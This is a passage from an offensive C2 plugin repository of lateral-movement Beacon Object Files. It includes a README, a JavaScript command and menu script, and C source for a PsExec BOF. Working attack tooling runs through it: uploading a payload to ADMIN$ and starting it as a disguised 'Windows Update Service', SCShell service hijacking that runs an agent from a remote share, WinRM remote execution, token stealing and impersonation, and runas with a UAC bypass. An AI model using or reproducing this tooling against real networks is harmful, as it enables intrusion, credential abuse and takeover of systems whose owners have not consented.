![](_img/01.png)

## jump psexec

Attempt to spawn a session on a remote target via PsExec

```
jump psexec [-b binary_name] [-s share] [-p svc_path] [-n svc_name] [-d svc_description] <target> <binary>
```


## jump scshell

Jumping with SCShell requires deploying a service binary to the target system, similar to psexec. It will no longer be fileless like invoke.

```
jump scshell <target> <svc_binary_path> [-n service_name] [-b binary_name] [-s share] [-p path]

#example
jump scshell 10.0.2.10 /tmp/agent_svc.exe -n defragsvc -b update.exe -s C$ -p C:\Windows
```

Common services that work well with SCShell:
- `defragsvc` - Disk Defragmentation Service
- `spooler` - Print Spooler
- `SensorService` - Server to manage sensors.
- `SessionEnv` - Remote Desktop Configuration
- `IKEEXT` - IKE and AuthIP IPsec Keying Modules

Choose services that:
- Are not critical to system operation
- Are not running (or can be stopped)
- Have sufficient privileges
- Are configured to start on-demand



## invoke winrm

Use WinRM to execute commands on other systems

```
invoke winrm <computer> <command> [-t timeout_ms] [-b]
```

* `-t` - Timeout in milliseconds to wait for output (0 = infinite)
* `-b` - Keep WinRM shell open for background execution, no output capture

Note: when using flags and a command with spaces, quote the command and place flags after it.


## invoke scshell

Execute commands on remote systems by temporarily modifying a service.

```
invoke scshell <target> <service_name> <command>

#example
invoke scshell 10.0.2.10 defragsvc "cmd.exe /c powershell -c \"$r=whoami;$r > C:\Temp\whoami.txt\""
```

Common services that work well with SCShell:
- `defragsvc` - Disk Defragmentation Service
- `spooler` - Print Spooler
- `SensorService` - Server to manage sensors.
- `SessionEnv` - Remote Desktop Configuration
- `IKEEXT` - IKE and AuthIP IPsec Keying Modules

Choose services that:
- Are not critical to system operation
- Are not running (or can be stopped)
- Have sufficient privileges
- Are configured to start on-demand



## runas-user

Runas is a BOF to run specific processes with different permissions than the user's current logon provides using explicit credentials.

```Shell
runas-user <username> <password> <domain> <command> [-l logon_type] [-t timeout] [-o] [-b]
```

* `-o` - With output capture
* `-b` - Bypass UAC (use with admin credentials)



## runas-session

Execute binary in another user's session via IHxHelpPaneServer COM.

```Shell
runas-session <session_id> <filepath>
```



## token make

Creates an impersonated token from a given credentials

```
token make <username> <password> <domain> <type>
```

![](_img/02.png)

The **Make token** item will be added to the **Access** menu in the Sessions Table and Graph.

![](_img/03.png)

![](_img/04.png)



## token steal

Steal access token from a process

```
token steal <pid>
```

The **Steal token** item will be added to the context menu in the Process Browser.

![](_img/05.png)


## Credits
* SCShell - https://github.com/Mr-Un1k0d3r/SCShell

================================================
FILE: LateralMovement-BOF/lateral.axs
================================================
var metadata = {
    name: "LateralMovement",
    description: "BOFs for lateral movement"
};

var _cmd_jump_psexec = ax.create_command("psexec", "Attempt to spawn a session on a remote target via PsExec", "jump psexec 192.168.0.1 /tmp/agent_svc.exe -b update.exe -s C$ -p C: -n UpdateService -d UpdateService");
_cmd_jump_psexec.addArgFlagString( "-b", "binary_name",     "Remote binary name", "random");
_cmd_jump_psexec.addArgFlagString( "-s", "share",           "Share for for copying the file", "ADMIN$");
_cmd_jump_psexec.addArgFlagString( "-p", "svc_path",        "Path to the service file", "C:\\Windows");
_cmd_jump_psexec.addArgFlagString( "-n", "svc_name",        "Service name", "random");
_cmd_jump_psexec.addArgFlagString( "-d", "svc_description", "Service description", "random");
_cmd_jump_psexec.addArgString("target", true);
_cmd_jump_psexec.addArgFile("binary", true);
_cmd_jump_psexec.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let target          = parsed_json["target"];
    let binary_content  = parsed_json["binary"];
    let share           = parsed_json["share"];
    let binary_name     = parsed_json["binary_name"];
    let svc_path        = parsed_json["svc_path"];
    let svc_name        = parsed_json["svc_name"];
    let svc_description = parsed_json["svc_description"];

    if (binary_name == "random")  binary_name = ax.random_string(8, "alphabetic") + ".exe";
    if (svc_name.length == "random")  svc_name = ax.random_string(10, "alphabetic");
    if (svc_description.length == "random")  svc_description = ax.random_string(16, "alphabetic");

    let bof_params = ax.bof_pack("cstr,bytes,cstr,cstr,cstr,cstr,cstr", [target, binary_content, binary_name, share, svc_path, svc_name, svc_description]);
    let bof_path = ax.script_dir() + "_bin/psexec." + ax.arch(id) + ".o";
    let message = `Task: Jump to ${target} via PsExec (${binary_name})`;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



var _cmd_jump_scshell = ax.create_command("scshell", "Attempt to spawn a session on a remote target via SCShell", "jump scshell 192.168.0.1 /tmp/agent_svc.exe -b update.exe -s C$ -p C:\\Windows -n defragsvc");
_cmd_jump_scshell.addArgFlagString( "-b", "binary_name",     "Remote binary name", "random");
_cmd_jump_scshell.addArgFlagString( "-s", "share",           "Share for copying the file", "ADMIN$");
_cmd_jump_scshell.addArgFlagString( "-p", "svc_path",        "Path to the service file", "C:\\Windows");
_cmd_jump_scshell.addArgFlagString( "-n", "svc_name",        "Service name to modify", "defragsvc");
_cmd_jump_scshell.addArgString("target", true);
_cmd_jump_scshell.addArgFile("binary", true);
_cmd_jump_scshell.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let target          = parsed_json["target"];
    let binary_content  = parsed_json["binary"];
    let share           = parsed_json["share"];
    let binary_name     = parsed_json["binary_name"];
    let svc_path        = parsed_json["svc_path"];
    let svc_name        = parsed_json["svc_name"];

    if (binary_name == "random")  binary_name = ax.random_string(8, "alphabetic") + ".exe";

    let remote_unc_path = `\\\\${target}\\${share}\\${binary_name}`;
    let local_path_on_target = `${svc_path}\\${binary_name}`;

    let bof_params = ax.bof_pack("cstr,cstr,cstr,bytes", [target, svc_name, remote_unc_path, binary_content]);
    let bof_path = ax.script_dir() + "_bin/scshell." + ax.arch(id) + ".o";
    let message = `Task: Jump to ${target} via SCShell (service: ${svc_name}, binary: ${binary_name})`;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



var cmd_jump = ax.create_command("jump", "Attempt to spawn a session on a remote target with the specified method");
cmd_jump.addSubCommands([_cmd_jump_psexec, _cmd_jump_scshell]);



var _cmd_invoke_winrm = ax.create_command("winrm", "Use WinRM to execute commands on other systems", "invoke winrm 192.168.0.1 \"whoami /all\" -t 60000 -u DOMAIN\\\\user -p P@ssw0rd");
_cmd_invoke_winrm.addArgString("target", true);
_cmd_invoke_winrm.addArgString("cmd", true);
_cmd_invoke_winrm.addArgFlagInt("-t", "timeout", "Timeout in milliseconds to wait for output (0 = infinite)", 0);
_cmd_invoke_winrm.addArgBool("-b", "background", "Keep WinRM shell open for background execution, no output");
_cmd_invoke_winrm.addArgFlagString("-u", "username", "Username for authentication (DOMAIN\\\\user)", "");
_cmd_invoke_winrm.addArgFlagString("-p", "password", "Password for authentication", "");
_cmd_invoke_winrm.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let target = parsed_json["target"];
    let cmd = parsed_json["cmd"];
    let timeout = parsed_json["timeout"];
    let background = parsed_json["-b"] ? 1 : 0;
    let username = parsed_json["username"];
    let password = parsed_json["password"];

    if (username.length > 0 && password.length == 0)
        throw new Error("Password is required when username is specified (-u requires -p)");

    let bof_params = ax.bof_pack("wstr,wstr,int,int,wstr,wstr", [target, cmd, timeout, background, username, password]);
    let bof_path = ax.script_dir() + "_bin/winrm." + ax.arch(id) + ".o";
    let message = username.length > 0
        ? `Task: Invoke to ${target} via WinRM as ${username}`
        : `Task: Invoke to ${target} via WinRM`;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



var _cmd_invoke_scshell = ax.create_command("scshell", "Use SCShell to execute commands on other systems by modifying service binary path (fileless)", "invoke scshell 10.0.2.10 defragsvc \"cmd.exe /c \\\\10.0.2.1\\share\\agent.exe\"");
_cmd_invoke_scshell.addArgString("target", true);
_cmd_invoke_scshell.addArgString("service", true);
_cmd_invoke_scshell.addArgString("payload", true);
_cmd_invoke_scshell.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let target = parsed_json["target"];
    let service = parsed_json["service"];
    let payload = parsed_json["payload"];

    let bof_params = ax.bof_pack("cstr,cstr,cstr", [target, service, payload]);
    let bof_path = ax.script_dir() + "_bin/scshell." + ax.arch(id) + ".o";
    let message = `Task: Invoke SCShell on ${target} (service: ${service})`;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



var cmd_invoke = ax.create_command("invoke", "Attempt to execute a command on a remote target with the specified method");
cmd_invoke.addSubCommands([_cmd_invoke_winrm, _cmd_invoke_scshell]);



let hook_impersonate = function (task)
{
    let regex = /impersonated successfully:\s+([^\s]+(?:\s[^\s\(\)\[]+)*)(?:\s*\(logon:\s*(\d+)\))?(?:\s*\[(elevated)\])?/i;
    let match = task.text.match(regex);
    if(match) {
        let user = match[1].trim();
        let logonType = match[2] ? parseInt(match[2]) : null;
        let isElevated = match[3] === "elevated";

        if(logonType) { user = user + " (" + logonType + ")"; }

        ax.agent_set_impersonate(task.agent, user, isElevated);
    }
    return task;
}

var _cmd_token_make = ax.create_command("make", "Creates an impersonated token from a given credentials", "token make admin P@ssword domain.local 8");
_cmd_token_make.addArgString("username", true);
_cmd_token_make.addArgString("password", true);
_cmd_token_make.addArgString("domain", true);
_cmd_token_make.addArgInt("type", true, "Logon type: 2 - Interactive\n                                        3 - Network\n                                        4 - Batch\n                                        5 - Service\n                                        8 - NetworkCleartext\n                                        9 - NewCredentials");
_cmd_token_make.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let username = parsed_json["username"];
    let password = parsed_json["password"];
    let domain = parsed_json["domain"];
    let type = parsed_json["type"];

    let bof_params = ax.bof_pack("wstr,wstr,wstr,int", [username, password, domain, type]);
    let bof_path = ax.script_dir() + "_bin/token_make." + ax.arch(id) + ".o";
    let message = `Task: make access token for ${domain}\\${username}`;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message, hook_impersonate);
});

var _cmd_token_steal = ax.create_command("steal", "Steal access token from a process", "token steal 608");
_cmd_token_steal.addArgInt("pid", true);
_cmd_token_steal.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let pid = parsed_json["pid"];
    let bof_params = ax.bof_pack("int", [pid]);
    let bof_path = ax.script_dir() + "_bin/token_steal." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: steal access token", hook_impersonate);
});

var cmd_token = ax.create_command("token", "Impersonate token");
cmd_token.addSubCommands([_cmd_token_make, _cmd_token_steal]);

var cmd_token_x = ax.create_command("token-x", "Impersonate token");
cmd_token_x.addSubCommands([_cmd_token_make, _cmd_token_steal]);



var cmd_runas_user = ax.create_command("runas-user", "Run a command as another user using explicit credentials (RunasCs-like)", "runas admin P@ssword domain.local \"cmd /c whoami\" -l 9 -t 30000 -o -b");
cmd_runas_user.addArgString("username", true, "Username for authentication");
cmd_runas_user.addArgString("password", true, "Password for authentication");
cmd_runas_user.addArgString("domain", true, "Domain (use '.' for local)");
cmd_runas_user.addArgString("command", true, "Command line to execute");
cmd_runas_user.addArgFlagInt("-l", "logon_type", "Logon type: 2-Interactive, 3-Network, 4-Batch, 5-Service, 8-NetworkCleartext, 9-NewCredentials", 2);
cmd_runas_user.addArgFlagInt("-t", "timeout", "Timeout in milliseconds to wait for process output (default: 120000)", 0);
cmd_runas_user.addArgBool("-o", "With output capture");
cmd_runas_user.addArgBool("-b", "Bypass UAC (use with admin credentials)");
cmd_runas_user.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let username   = parsed_json["username"];
    let password   = parsed_json["password"];
    let domain     = parsed_json["domain"];
    let command    = parsed_json["command"];
    let logon_type = parsed_json["logon_type"];
    let timeout    = parsed_json["timeout"];
    let no_output  = parsed_json["-o"] ? 0 : 1;
    let bypass_uac = parsed_json["-b"] ? 1 : 0;

    let bof_params = ax.bof_pack("wstr,wstr,wstr,wstr,int,int,int,int", [username, password, domain, command, logon_type, timeout, no_output, bypass_uac]);
    let bof_path = ax.script_dir() + "_bin/runas." + ax.arch(id) + ".o";
    let message = `Task: runas ${domain}\\${username} -> '${command}'`;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});




var cmd_runas_session = ax.create_command("runas-session", "Execute binary in another user's session via IHxHelpPaneServer COM", "runas-session 3 C:\\Windows\\Temp\\file.exe");
cmd_runas_session.addArgInt("session_id", true);
cmd_runas_session.addArgString("filepath", true);
cmd_runas_session.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let sessId = parsed_json["session_id"];
    let path   = parsed_json["filepath"];

    if( ax.is64(id) == false ) { throw new Error("WoW64 is not supported"); }

    if( ax.isadmin(id) == false ) { throw new Error("You need to be admin to run nanodump"); }

    let bof_params = ax.bof_pack("int,wstr", [sessId, path]);
    let bof_path = ax.script_dir() + "_bin/runas_sess_ihxexec." + ax.arch(id) + ".o";
    let message = `Task: Cross-Sessions executeion ${path}`;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



var group_lateral = ax.create_commands_group("LateralMovement-BOF", [cmd_jump, cmd_invoke, cmd_token, cmd_runas_user, cmd_runas_session]);
ax.register_commands_group(group_lateral, ["beacon", "gopher"], ["windows"], []);

var group_lateral_x = ax.create_commands_group("LateralMovement-BOF-X", [cmd_jump, cmd_invoke, cmd_token_x, cmd_runas_user, cmd_runas_session]);
ax.register_commands_group(group_lateral_x, ["kharon"], ["windows"], []);



/// MENU

let token_steal_action = menu.create_action("Steal token", function(process_list) {
    if (process_list.length > 0 ) {
        let proc = process_list[0];
        ax.execute_command(proc.agent_id, "token steal " + proc.pid);
    }
});
menu.add_processbrowser(token_steal_action, ["beacon", "gopher"], ["windows"]);

let token_make_action = menu.create_action("Make token", function(agent_list) {
    if (agent_list.length > 0 ) {

        let map_logon = { "LOGON_INTERACTIVE": 2, "LOGON_NETWORK": 3, "LOGON_BATCH": 4, "LOGON_SERVICE": 5, "LOGON_NETWORK_CLEARTEXT":8, "LOGON_NEW_CREDENTIALS":9 };

        let creds_selector = form.create_selector_credentials(["username", "password", "realm", "tag"]);
        creds_selector.setSize(800, 400);

        let username_label = form.create_label("Username:");
        let username_text  = form.create_textline();
        let select_button  = form.create_button("...");
        let password_label = form.create_label("Password:");
        let password_text  = form.create_textline();
        let realm_label    = form.create_label("Realm:");
        let realm_text     = form.create_textline();
        let logon_label    = form.create_label("Logon type:");
        let logon_combo    = form.create_combo();
        logon_combo.setItems(["LOGON_INTERACTIVE", "LOGON_NETWORK", "LOGON_BATCH", "LOGON_SERVICE", "LOGON_NETWORK_CLEARTEXT", "LOGON_NEW_CREDENTIALS"]);
        logon_combo.setCurrentIndex(5);

        form.connect(select_button, "clicked", function(){
            let cred_list = creds_selector.exec();
            if (cred_list.length > 0) {
                let cred = cred_list[0];
                if(cred["realm"].length == 0) { cred["realm"] = "."; }
                username_text.setText(cred["username"]);
                password_text.setText(cred["password"]);
                realm_text.setText(cred["realm"]);
            }
        });

        let layout = form.create_gridlayout();
        layout.addWidget(username_label, 0, 0, 1, 1);
        layout.addWidget(username_text,  0, 1, 1, 1);
        layout.addWidget(select_button,  0, 2, 1, 1);
        layout.addWidget(password_label, 1, 0, 1, 1);
        layout.addWidget(password_text,  1, 1, 1, 1);
        layout.addWidget(realm_label,    2, 0, 1, 1);
        layout.addWidget(realm_text,     2, 1, 1, 1);
        layout.addWidget(logon_label,    3, 0, 1, 1);
        layout.addWidget(logon_combo,    3, 1, 1, 1);

        let dialog = form.create_dialog("Make token");
        dialog.setSize(440, 200);
        dialog.setLayout(layout);
        dialog.setButtonsText("Make", "Cancel");
        while(dialog.exec()) {
            if(username_text.text().length == 0 || password_text.text().length == 0 || realm_text.text().length == 0) { continue; }

            let command = `token make ${username_text.text()} "${password_text.text()}" ${realm_text.text()} ${map_logon[logon_combo.currentText()]}`;
            agent_list.forEach(id => ax.execute_command(id, command));
            break;
        }
    }
});
menu.add_session_access(token_make_action, ["beacon", "gopher"], ["windows"]);



/// MENU TARGETS

let psexec_action = menu.create_action("PsExec", function(targets_id) {
    let agents_selector = form.create_selector_agents(["id", "type", "computer", "username", "process", "pid", "tags"]);
    agents_selector.setSize(1000, 400);

    let label_format = form.create_label("Target format:");
    let combo_format = form.create_combo();
    combo_format.addItems(["FQDN", "IP address"]);

    let label_file  = form.create_label("Payload file:");
    let text_file   = form.create_textline();
    let button_file = form.create_button("...");

    let agent_label   = form.create_label("Session:");
    let agent_text    = form.create_textline();
    let select_button = form.create_button("...");

    let hline = form.create_hline()

    let share_label = form.create_label("Share:");
    let share_text  = form.create_textline();
    share_text.setPlaceholder("Default: ADMIN$");

    let path_label = form.create_label("Remote path:");
    let path_text  = form.create_textline();
    path_text.setPlaceholder("Default: C:\\Windows");

    let bin_name_label = form.create_label("Binary name:");
    let bin_name_text  = form.create_textline();
    bin_name_text.setPlaceholder("Default: random");

    let svc_name_label = form.create_label("Svc Name:");
    let svc_name_text  = form.create_textline();
    svc_name_text.setPlaceholder("Default: random");

    let svc_desc_label = form.create_label("Svc Description:");
    let svc_desc_text  = form.create_textline();
    svc_desc_text.setPlaceholder("Default: random");

    let layout = form.create_gridlayout();
    layout.addWidget(label_format,   0, 0, 1, 1);
    layout.addWidget(combo_format,   0, 1, 1, 2);
    layout.addWidget(label_file,     1, 0, 1, 1);
    layout.addWidget(text_file,      1, 1, 1, 1);
    layout.addWidget(button_file,    1, 2, 1, 1);
    layout.addWidget(agent_label,    2, 0, 1, 1);
    layout.addWidget(agent_text,     2, 1, 1, 1);
    layout.addWidget(select_button,  2, 2, 1, 1);
    layout.addWidget(hline,          3, 0, 1, 3);
    layout.addWidget(share_label,    4, 0, 1, 1);
    layout.addWidget(share_text,     4, 1, 1, 2);
    layout.addWidget(path_label,     5, 0, 1, 1);
    layout.addWidget(path_text,      5, 1, 1, 2);
    layout.addWidget(bin_name_label, 6, 0, 1, 1);
    layout.addWidget(bin_name_text,  6, 1, 1, 2);
    layout.addWidget(svc_name_label, 7, 0, 1, 1);
    layout.addWidget(svc_name_text,  7, 1, 1, 2);
    layout.addWidget(svc_desc_label, 8, 0, 1, 1);
    layout.addWidget(svc_desc_text,  8, 1, 1, 2);

    form.connect(select_button, "clicked", function(){
        let agents = agents_selector.exec();
        if (agents.length > 0) {
            let agent = agents[0];
            agent_text.setText(agent["id"]);
        }
    });

    form.connect(button_file, "clicked", function() {
        text_file.setText( ax.prompt_open_file() );
    });

    let dialog = form.create_dialog("Jump using PsExec");
    dialog.setSize(500, 300);
    dialog.setLayout(layout);
    dialog.setButtonsText("Execute", "Cancel");
    while ( dialog.exec() == true )  {
        let payload_path = text_file.text();
        if(payload_path.length == 0) { ax.show_message("Error", "Payload not specified"); continue; }

        let payload_content = ax.file_read(payload_path);
        if(payload_content.length == 0) { ax.show_message("Error", `file ${payload_path} not readed`); continue; }

        let format = combo_format.currentText();
        let agent_id = agent_text.text();

        let command_params = "";
        if (share_text.text().length)    { command_params += ` -s "${share_text.text()}"`; }
        if (path_text.text().length)     { command_params += ` -p "${path_text.text()}"`; }
        if (bin_name_text.text().length) { command_params += ` -b "${bin_name_text.text()}"`; }
        if (svc_name_text.text().length) { command_params += ` -n "${svc_name_text.text()}"`; }
        if (svc_desc_text.text().length) { command_params += ` -d "${svc_desc_text.text()}"`; }

        let targets = ax.targets()
        targets_id.forEach((id) => {
            let addr = targets[id].address;
            if(format == "FQDN") { addr = targets[id].computer; }
            if(addr.length == 0 ) {
                ax.show_message("Error", "Target is empty!");
            }
            else {
                let command = `jump psexec ${addr} ${payload_path}`;
                if (command_params.length > 0)
                    command += command_params;

                ax.execute_command(agent_id, command);
            }
        });
        break;
    }
});

let jump_menu = menu.create_menu("Jump to   ");
jump_menu.addItem(psexec_action)
menu.add_targets(jump_menu, "top");



let winrm_action = menu.create_action("WinRM", function(targets_id) {
    let agents_selector = form.create_selector_agents(["id", "type", "computer", "username", "process", "pid", "tags"]);
    agents_selector.setSize(1000, 400);

    let creds_selector = form.create_selector_credentials(["username", "password", "realm", "tag"]);
    creds_selector.setSize(800, 400);

    let label_format = form.create_label("Target format:");
    let combo_format = form.create_combo();
    combo_format.addItems(["FQDN", "IP address"]);

    let label_command = form.create_label("Command:");
    let text_command  = form.create_textmulti();

    let agent_label   = form.create_label("Session:");
    let agent_text    = form.create_textline();
    let select_button = form.create_button("...");

    let hline = form.create_hline();

    let username_label  = form.create_label("Username:");
    let username_text   = form.create_textline();
    username_text.setPlaceholder("DOMAIN\\\\user (empty = current context)");
    let creds_button    = form.create_button("...");

    let password_label  = form.create_label("Password:");
    let password_text   = form.create_textline();

    let layout = form.create_gridlayout();
    layout.addWidget(label_format,   0, 0, 1, 1);
    layout.addWidget(combo_format,   0, 1, 1, 2);
    layout.addWidget(label_command,  1, 0, 1, 1);
    layout.addWidget(text_command,   1, 1, 1, 2);
    layout.addWidget(agent_label,    2, 0, 1, 1);
    layout.addWidget(agent_text,     2, 1, 1, 1);
    layout.addWidget(select_button,  2, 2, 1, 1);
    layout.addWidget(hline,          3, 0, 1, 3);
    layout.addWidget(username_label, 4, 0, 1, 1);
    layout.addWidget(username_text,  4, 1, 1, 1);
    layout.addWidget(creds_button,   4, 2, 1, 1);
    layout.addWidget(password_label, 5, 0, 1, 1);
    layout.addWidget(password_text,  5, 1, 1, 2);

    form.connect(select_button, "clicked", function(){
        let agents = agents_selector.exec();
        if (agents.length > 0) {
            let agent = agents[0];
            agent_text.setText(agent["id"]);
        }
    });

    form.connect(creds_button, "clicked", function(){
        let cred_list = creds_selector.exec();
        if (cred_list.length > 0) {
            let cred = cred_list[0];
            let user = cred["username"];
            if (cred["realm"].length > 0) { user = cred["realm"] + "\\" + user; }
            username_text.setText(user);
            password_text.setText(cred["password"]);
        }
    });

    let dialog = form.create_dialog("Invoke using WinRM");
    dialog.setSize(500, 280);
    dialog.setLayout(layout);
    dialog.setButtonsText("Execute", "Cancel");
    while ( dialog.exec() == true )  {

        let target_cmd = text_command.text();
        if(target_cmd.length == 0) { ax.show_message("Error", "Command not specified"); continue; }

        let format = combo_format.currentText();
        let agent_id = agent_text.text();

        let cred_params = "";
        if (username_text.text().length > 0) {
            if (password_text.text().length == 0) { ax.show_message("Error", "Password required when username is specified"); continue; }
            cred_params = ` -u "${username_text.text()}" -p "${password_text.text()}"`;
        }

        let targets = ax.targets()
        targets_id.forEach((id) => {
            let addr = targets[id].address;
            if(format == "FQDN") { addr = targets[id].computer; }
            if(addr.length == 0 ) {
                ax.show_message("Error", "Target is empty!");
            }
            else {
                let command = `invoke winrm ${addr} "${target_cmd}"` + cred_params;
                ax.execute_command(agent_id, command);
            }
        });
        break;
    }
});

let invoke_menu = menu.create_menu("Invoke on   ");
invoke_menu.addItem(winrm_action)
menu.add_targets(invoke_menu, "top");

================================================
FILE: LateralMovement-BOF/psexec/psexec.c
================================================
#include <windows.h>
#include <stdio.h>
#include "beacon.h"

WINBASEAPI int __cdecl MSVCRT$_snprintf(char * __restrict__ d, size_t n, const char * __restrict__ format, ...);
WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(VOID);
WINBASEAPI VOID WINAPI KERNEL32$Sleep(DWORD dwMilliseconds);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile );
WINBASEAPI BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped );
WINBASEAPI BOOL WINAPI KERNEL32$DeleteFileA( LPCSTR lpFileName );
WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);
WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR lpMachineName,LPCSTR lpDatabaseName,DWORD dwDesiredAccess);
WINADVAPI SC_HANDLE WINAPI ADVAPI32$CreateServiceA(SC_HANDLE hSCManager,LPCSTR lpServiceName,LPCSTR lpDisplayName,DWORD dwDesiredAccess,DWORD dwServiceType,DWORD dwStartType,DWORD dwErrorControl,LPCSTR lpBinaryPathName,LPCSTR lpLoadOrderGroup,LPDWORD lpdwTagId,LPCSTR lpDependencies,LPCSTR lpServiceStartName,LPCSTR lpPassword);
WINADVAPI WINBOOL WINAPI ADVAPI32$CloseServiceHandle(SC_HANDLE hSCObject);
WINADVAPI WINBOOL WINAPI ADVAPI32$StartServiceA(SC_HANDLE hService,DWORD dwNumServiceArgs,LPCSTR *lpServiceArgVectors);

void go(char *args, int len)
{
    datap parser;
    BeaconDataParse(&parser, args, len);

    ULONG tmp = 0;
    ULONG svcBinarySize = 0;
    CHAR* target      = BeaconDataExtract(&parser, NULL);
    CHAR* svcBinary   = BeaconDataExtract(&parser, &svcBinarySize);
    CHAR* binaryName  = BeaconDataExtract(&parser, &tmp);
    CHAR* share       = BeaconDataExtract(&parser, &tmp);
    CHAR* servicePath = BeaconDataExtract(&parser, &tmp);
    CHAR* serviceName = BeaconDataExtract(&parser, &tmp);
    CHAR* displayName = BeaconDataExtract(&parser, &tmp);

    // handle empty parameters with defaults
    if (!binaryName || binaryName[0] == '\0')    binaryName = "service.exe";
    if (!share || share[0] == '\0')              share = "ADMIN$";
    if (!servicePath || servicePath[0] == '\0')  servicePath = "\\\\%SYSTEMROOT%";
    if (!serviceName || serviceName[0] == '\0')  serviceName = "WindowsUpdateService";
    if (!displayName || displayName[0] == '\0')  displayName = "Windows Update Service";

    CHAR remotePath[MAX_PATH];
    MSVCRT$_snprintf(remotePath, sizeof(remotePath), "\\\\%s\\%s\\%s", target, share, binaryName);
    BeaconPrintf(CALLBACK_OUTPUT, "Uploading binary to %s", remotePath);

    HANDLE hFile = KERNEL32$CreateFileA(remotePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        DWORD err = KERNEL32$GetLastError();
        BeaconPrintf(CALLBACK_ERROR, "Failed to create remote file: %lu", err);
        if (err == 5)
            BeaconPrintf(CALLBACK_ERROR, "Access denied - check credentials and share permissions");
        return;
    }

    DWORD bytesWritten;
    if (!KERNEL32$WriteFile(hFile, svcBinary, svcBinarySize, &bytesWritten, NULL)) {
        BeaconPrintf(CALLBACK_ERROR, "Failed to write file: %lu", KERNEL32$GetLastError());
        KERNEL32$CloseHandle(hFile);
        KERNEL32$DeleteFileA(remotePath);
        return;
    }
    if (bytesWritten != svcBinarySize) {
        BeaconPrintf(CALLBACK_ERROR, "Incomplete write: %lu of %lu bytes", bytesWritten, svcBinarySize);
        KERNEL32$CloseHandle(hFile);
        KERNEL32$DeleteFileA(remotePath);
        return;
    }
    KERNEL32$CloseHandle(hFile);
    BeaconPrintf(CALLBACK_OUTPUT, "Successfully uploaded %lu bytes", bytesWritten);

    SC_HANDLE hSCM = ADVAPI32$OpenSCManagerA(target, NULL, SC_MANAGER_CREATE_SERVICE);
    if (!hSCM) {
        DWORD err = KERNEL32$GetLastError();
        BeaconPrintf(CALLBACK_ERROR, "Failed to open SCM: %lu", err);
        if (err == 5)
            BeaconPrintf(CALLBACK_ERROR, "Access denied - need Administrator privileges on target");
        KERNEL32$DeleteFileA(remotePath);
        return;
    }

    KERNEL32$Sleep(500);

    char payloadPath[MAX_PATH];
    MSVCRT$_snprintf(payloadPath, sizeof(payloadPath), "%s\\%s", servicePath, binaryName);
    BeaconPrintf(CALLBACK_OUTPUT, "Creating service '%s' with path '%s'", serviceName, payloadPath);

    SC_HANDLE hSvc = ADVAPI32$CreateServiceA( hSCM, serviceName, displayName, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, payloadPath, NULL, NULL, NULL, NULL, NULL);
    if (!hSvc) {
        DWORD err = KERNEL32$GetLastError();
        BeaconPrintf(CALLBACK_ERROR, "Failed to create service: %lu", err);
        if (err == 1073)
            BeaconPrintf(CALLBACK_ERROR, "Service already exists (error 1073) - use SCExec BOF");
        else if (err == 1072)
            BeaconPrintf(CALLBACK_ERROR, "Service marked for deletion (error 1072) - wait and retry");
        ADVAPI32$CloseServiceHandle(hSCM);
        KERNEL32$DeleteFileA(remotePath);
        return;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "Service created successfully");

    KERNEL32$Sleep(500);


    if (!ADVAPI32$StartServiceA(hSvc, 0, NULL)) {
        DWORD err = KERNEL32$GetLastError();
        if (err == 1053) {
            BeaconPrintf(CALLBACK_OUTPUT, "Service start timeout (error 1053) - service may have started successfully. Check for beacon callback!");
        } else {
            BeaconPrintf(CALLBACK_ERROR, "Failed to start service: %lu", err);
            if (err == 1058)
                BeaconPrintf(CALLBACK_ERROR, "Service disabled - cannot start");
            else if (err == 1069)
                BeaconPrintf(CALLBACK_ERROR, "Service logon failure - check service account");
        }
        return;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "Service '%s' started successfully", serviceName);

    // // cleanup phase - stop and delete service, then delete file
    // BeaconPrintf(CALLBACK_OUTPUT, "Cleaning up service and file...");
    // KERNEL32$Sleep(2000);
    //
    // SERVICE_STATUS status;
    // ADVAPI32$ControlService(hSvc, SERVICE_CONTROL_STOP, &status);
    // KERNEL32$Sleep(500);
    //
    // if (ADVAPI32$DeleteService(hSvc)) {
    //     BeaconPrintf(CALLBACK_OUTPUT, "Service deleted");
    // }
    //
    // ADVAPI32$CloseServiceHandle(hSvc);
    // ADVAPI32$CloseServiceHandle(hSCM);
    //
    // KERNEL32$Sleep(500);
    // if (KERNEL32$DeleteFileA(remotePath)) {
